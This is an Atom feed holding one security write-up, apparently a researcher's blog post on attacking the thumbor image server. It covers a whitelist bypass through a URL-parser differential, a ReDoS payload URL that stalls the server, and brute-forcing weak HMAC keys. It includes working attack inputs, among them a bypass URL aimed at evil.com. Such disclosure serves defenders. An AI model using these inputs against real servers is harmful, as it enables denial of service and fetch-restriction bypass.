<?xml version="1.0" encoding="utf-8"?><feed xmlns="http://www.w3.org/2005/Atom" xml:lang="en"><generator uri="https://jekyllrb.com/" version="4.4.1">Jekyll</generator><link href="https://geraldino2.github.io/feed.xml" rel="self" type="application/atom+xml"/><link href="https://geraldino2.github.io/" rel="alternate" type="text/html" hreflang="en"/><updated>2026-01-31T15:38:48+00:00</updated><id>https://geraldino2.github.io/feed.xml</id><title type="html">blank</title><subtitle>apolo2&apos;s personal blog</subtitle><entry><title type="html">Attacking thumbor</title><link href="https://geraldino2.github.io/blog/2026/attacking-thumbor/" rel="alternate" type="text/html" title="Attacking thumbor"/><published>2026-01-29T00:00:00+00:00</published><updated>2026-01-29T00:00:00+00:00</updated><id>https://geraldino2.github.io/blog/2026/attacking-thumbor</id><content type="html" xml:base="https://geraldino2.github.io/blog/2026/attacking-thumbor/"><![CDATA[<p><a href="https://github.com/thumbor/thumbor">thumbor</a> is an open-source image processing server, similar to <a href="https://developers.cloudflare.com/images/">Cloudflare Images</a> or <a href="https://imgproxy.net/">imgproxy</a>.</p> <p>The easiest way to send an image to be treated by it is to use unsafe URLs, <a href="https://github.com/thumbor/thumbor/blob/f83495a819d5d417317fc3dbf7a4d10872b4f15f/thumbor/config.py#L385-L390">enabled by default</a>, in the format <a href="http://thumbor-server/unsafe/300x300/path/to/image.jpg">http://thumbor-server/unsafe/300x300/smart/path/to/image.jpg</a>. An obvious problem is that attackers can manipulate the options passed to the server; thumbor relates this security issue to a possibility of <a href="https://github.com/thumbor/thumbor/blob/f83495a819d5d417317fc3dbf7a4d10872b4f15f/docs/security.rst">DoS through spam</a> and recommends to use HMAC signed URLs as a solution.</p> <p>This blog post covers:</p> <ul> <li>Domain whitelist bypass via a parser differential between <code class="language-plaintext highlighter-rouge">tornado</code> and <code class="language-plaintext highlighter-rouge">urlparse</code>;</li> <li>Single request denial of service through ReDoS;</li> <li>Attacking the HMAC security key via brute force;</li> <li>Some other random stuff.</li> </ul> <h2 id="domain-whitelist-bypass">Domain whitelist bypass</h2> <p>thumbor provides multiple configurations to harden what the server can do, such as <code class="language-plaintext highlighter-rouge">MAX_WIDTH</code> or <code class="language-plaintext highlighter-rouge">ALLOWED_SOURCES</code>; the latter defines which FQDNs thumbor can download images from.</p> <p>The call stack trace on processing an external image is quite long, but it all starts on <code class="language-plaintext highlighter-rouge">handlers/imaging.py:get</code> and the most important methods related to download are on <code class="language-plaintext highlighter-rouge">loaders/http_loader.py</code>. <code class="language-plaintext highlighter-rouge">loaders/http_loader.py:validate</code> validates if the given URL is within the whitelist defined by <code class="language-plaintext highlighter-rouge">ALLOWED_SOURCES</code> and <code class="language-plaintext highlighter-rouge">loaders/http_loader.py:load</code> is responsible for the download itself. After a lot of simplifications, the code for both functions look like this:</p> <div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">import</span> <span class="n">re</span>
<span class="kn">import</span> <span class="n">tornado</span>
<span class="kn">from</span> <span class="n">urllib.parse</span> <span class="kn">import</span> <span class="n">urlparse</span>

<span class="k">def</span> <span class="nf">validate</span><span class="p">(</span><span class="n">context</span><span class="p">,</span> <span class="n">url</span><span class="p">):</span>
    <span class="n">res</span> <span class="o">=</span> <span class="nf">urlparse</span><span class="p">(</span><span class="n">url</span><span class="p">)</span>
    <span class="k">for</span> <span class="n">pattern</span> <span class="ow">in</span> <span class="n">context</span><span class="p">.</span><span class="n">config</span><span class="p">.</span><span class="n">ALLOWED_SOURCES</span><span class="p">:</span>
        <span class="n">pattern</span> <span class="o">=</span> <span class="sa">f</span><span class="sh">"</span><span class="s">^</span><span class="si">{</span><span class="n">pattern</span><span class="si">}</span><span class="s">$</span><span class="sh">"</span>
        <span class="n">match</span> <span class="o">=</span> <span class="n">res</span><span class="p">.</span><span class="n">hostname</span>
        <span class="k">if</span> <span class="n">re</span><span class="p">.</span><span class="nf">match</span><span class="p">(</span><span class="n">pattern</span><span class="p">,</span> <span class="n">match</span><span class="p">):</span>
            <span class="k">return</span> <span class="bp">True</span>
    <span class="k">return</span> <span class="bp">False</span>
<span class="k">async</span> <span class="k">def</span> <span class="nf">load</span><span class="p">(</span><span class="n">url</span><span class="p">):</span>
    <span class="k">return</span> <span class="n">tornado</span><span class="p">.</span><span class="n">httpclient</span><span class="p">.</span><span class="nc">HTTPRequest</span><span class="p">(</span><span class="n">url</span><span class="o">=</span><span class="n">url</span><span class="p">)</span>
</code></pre></div></div> <p><code class="language-plaintext highlighter-rouge">ALLOWED_SOURCES</code> is an array of FQDNs. The function uses <code class="language-plaintext highlighter-rouge">urllib</code> to extract the FQDN from an URL and compares it to each value from the array. If the validation succeeds, the URL is passed to <code class="language-plaintext highlighter-rouge">load</code>. There’s one problem with this approach: <code class="language-plaintext highlighter-rouge">thumbor</code> doesn’t have a guarantee that <code class="language-plaintext highlighter-rouge">tornado</code> will use the same URL parser used on <code class="language-plaintext highlighter-rouge">validate</code>.</p> <p>Going deep into <code class="language-plaintext highlighter-rouge">tornado</code> one can see that it indeed uses <code class="language-plaintext highlighter-rouge">urllib</code>, but it also implements its own logic to separate hosts from ports. A simplified version of the code is provided below:</p> <div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">import</span> <span class="n">re</span>
<span class="kn">from</span> <span class="n">urllib.parse</span> <span class="kn">import</span> <span class="n">urlsplit</span>

<span class="k">def</span> <span class="nf">parse_url_host_port</span><span class="p">(</span><span class="n">url</span><span class="p">:</span> <span class="nb">str</span><span class="p">)</span> <span class="o">-&gt;</span> <span class="nb">tuple</span><span class="p">[</span><span class="nb">str</span><span class="p">,</span> <span class="nb">int</span> <span class="o">|</span> <span class="bp">None</span><span class="p">]:</span>
    <span class="n">netloc</span> <span class="o">=</span> <span class="nf">urlsplit</span><span class="p">(</span><span class="n">url</span><span class="p">).</span><span class="n">netloc</span>
    <span class="n">_netloc_re</span> <span class="o">=</span> <span class="n">re</span><span class="p">.</span><span class="nf">compile</span><span class="p">(</span><span class="sa">r</span><span class="sh">"</span><span class="s">^(.+):(\d+)$</span><span class="sh">"</span><span class="p">)</span>
    <span class="n">match</span> <span class="o">=</span> <span class="n">_netloc_re</span><span class="p">.</span><span class="nf">match</span><span class="p">(</span><span class="n">netloc</span><span class="p">)</span>
    <span class="k">if</span> <span class="n">match</span><span class="p">:</span>
        <span class="n">host</span> <span class="o">=</span> <span class="n">match</span><span class="p">.</span><span class="nf">group</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span>
        <span class="n">port</span> <span class="o">=</span> <span class="nf">int</span><span class="p">(</span><span class="n">match</span><span class="p">.</span><span class="nf">group</span><span class="p">(</span><span class="mi">2</span><span class="p">))</span>
    <span class="k">else</span><span class="p">:</span>
        <span class="n">host</span> <span class="o">=</span> <span class="n">netloc</span>
        <span class="n">port</span> <span class="o">=</span> <span class="bp">None</span>
    <span class="k">return</span> <span class="n">host</span><span class="p">,</span> <span class="n">port</span>
</code></pre></div></div> <p>Note that <code class="language-plaintext highlighter-rouge">tornado</code> restricts ports to integer numbers, while <code class="language-plaintext highlighter-rouge">urlparse</code> doesn’t. An URL such as <code class="language-plaintext highlighter-rouge">http://allowed-domain.com:.evil.com</code> will be seen by <code class="language-plaintext highlighter-rouge">validate</code> as containing an allowed hostname (<code class="language-plaintext highlighter-rouge">allowed-domain.com</code> as a hostname and <code class="language-plaintext highlighter-rouge">.evil.com</code> as a port), but <code class="language-plaintext highlighter-rouge">tornado</code> says that the hostname is actually <code class="language-plaintext highlighter-rouge">allowed-domain.com:.evil.com</code>.</p> <p>Although <code class="language-plaintext highlighter-rouge">allowed-domain.com:.evil.com</code> is technically not a valid FQDN, <code class="language-plaintext highlighter-rouge">tornado</code> uses <code class="language-plaintext highlighter-rouge">socket.getaddrinfo</code> to get the IP address; this method considers <code class="language-plaintext highlighter-rouge">evil.com</code> to be the hostname, bypassing the whitelist.</p> <h2 id="redos">ReDoS</h2> <p>Regular expressions can take up to exponential time to evaluate, and excessive use of resources may cause a denial of service (<a href="https://cwe.mitre.org/data/definitions/1333.html">CWE-1333</a>). The <a href="https://blog.cloudflare.com/details-of-the-cloudflare-outage-on-july-2-2019/">Cloudflare outage in 2019</a> is probably the most well-known example of that.</p> <p>Besides resizing images, thumbor can also apply filters to them. Filters use regexes. Multiple defined filters can take up to exponential or polynomial time to evaluate. An exhaustive list of them won’t be provided, but the <code class="language-plaintext highlighter-rouge">convolution</code> filter is an example: <code class="language-plaintext highlighter-rouge">/convolution\((?:\s*((?:[-]?[\d]+\.?[\d]*[;])*(?:[-]?[\d]+\.?[\d]*))\s*)(?:,\s*([\d]+)\s*)(?:,\s*([Tt]rue|[Ff]alse|1|0)\s*)?\)/</code> is $O(2^n)$.</p> <p><a href="http://thumbor-server/unsafe/0x0/smart/filters:convolution(-11;-11;-11;-11;-11;-11;-11;-11;-11;-11;-11;-11;-11;-11;-11;-11;-11;-11;-11;-11;-11;-11;-11;-11;-11;-11;-11;-11;-11;-11)/x.png"><code class="language-plaintext highlighter-rouge">http://thumbor-server/unsafe/0x0/smart/filters:convolution(-11;-11;-11;-11;-11;-11;-11;-11;-11;-11;-11;-11;-11;-11;-11;-11;-11;-11;-11;-11;-11;-11;-11;-11;-11;-11;-11;-11;-11;-11)/x.png</code> </a>causes the call to <code class="language-plaintext highlighter-rouge">re.match</code> on <a href="https://github.com/thumbor/thumbor/blob/f83495a819d5d417317fc3dbf7a4d10872b4f15f/thumbor/filters/__init__.py#L189"><code class="language-plaintext highlighter-rouge">thumbor/thumbor/filters/__init__.py#L189</code></a> to take too long and stalls the server.</p> <h2 id="brute-force-attack-on-hmac">Brute force attack on HMAC</h2> <p>For some reason the documentation states that the <code class="language-plaintext highlighter-rouge">SECURITY_KEY</code> for HMAC should be <a href="https://github.com/thumbor/thumbor/blob/f83495a819d5d417317fc3dbf7a4d10872b4f15f/thumbor/thumbor.conf#x:~:text=16%20characters">up to 16 characters</a>. The code, however, doesn’t implement that limit and it’s actually better to use longer and complex keys.</p> <p>Given an URL defined as <a href="http://thumbor-server/hash-signature/0x0/smart/x.png"><code class="language-plaintext highlighter-rouge">http://thumbor-server/hash-signature/0x0/smart/x.png</code> </a>, , the signature will be defined on top of <code class="language-plaintext highlighter-rouge">0x0/smart/x.png</code>. As the default URL signer computes the signature as the code below, it’s trivial to use brute force or dictionary attacks against weak keys.</p> <div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">def</span> <span class="nf">signature</span><span class="p">(</span><span class="n">self</span><span class="p">,</span> <span class="n">url</span><span class="p">):</span>
    <span class="k">return</span> <span class="n">base64</span><span class="p">.</span><span class="nf">urlsafe_b64encode</span><span class="p">(</span>
        <span class="n">hmac</span><span class="p">.</span><span class="nf">new</span><span class="p">(</span>
            <span class="n">self</span><span class="p">.</span><span class="n">security_key</span><span class="p">,</span> <span class="nf">text_type</span><span class="p">(</span><span class="n">url</span><span class="p">).</span><span class="nf">encode</span><span class="p">(</span><span class="sh">"</span><span class="s">utf-8</span><span class="sh">"</span><span class="p">),</span> <span class="n">hashlib</span><span class="p">.</span><span class="n">sha1</span>
        <span class="p">).</span><span class="nf">digest</span><span class="p">()</span>
    <span class="p">)</span>
</code></pre></div></div> <h2 id="miscellaneous">Miscellaneous</h2> <ul> <li>Documentation says that it’s possible to define a callback function for JSONP in the configuration file (<code class="language-plaintext highlighter-rouge">META_CALLBACK_NAME</code>). Although not documented, it’s also possible to do it in the URL: <a href="http://thumbor-server/unsafe/meta/0x0/smart/x.png?callback=foobar">http://thumbor-server/unsafe/meta/0x0/smart/x.png?callback=foobar</a>;</li> <li>It’s possible, and potentially dangerous, to have uploads enabled with a non-default configuration of <code class="language-plaintext highlighter-rouge">UPLOAD_ENABLED</code>;</li> <li><code class="language-plaintext highlighter-rouge">USE_BLACKLIST</code> is also a non-default configuration that enables unprivileged users to add URLs to a blacklist. The blacklist is case sensitive and doesn’t process the URL in any way.</li> </ul>]]></content><author><name></name></author><category term="cybersec"/><category term="writeup"/><category term="web"/><category term="server-side"/><category term="parser-differential"/><summary type="html"><![CDATA[parser differential between tornado and urlparse, ReDoS, bruteforce, misconfigurations]]></summary></entry></feed>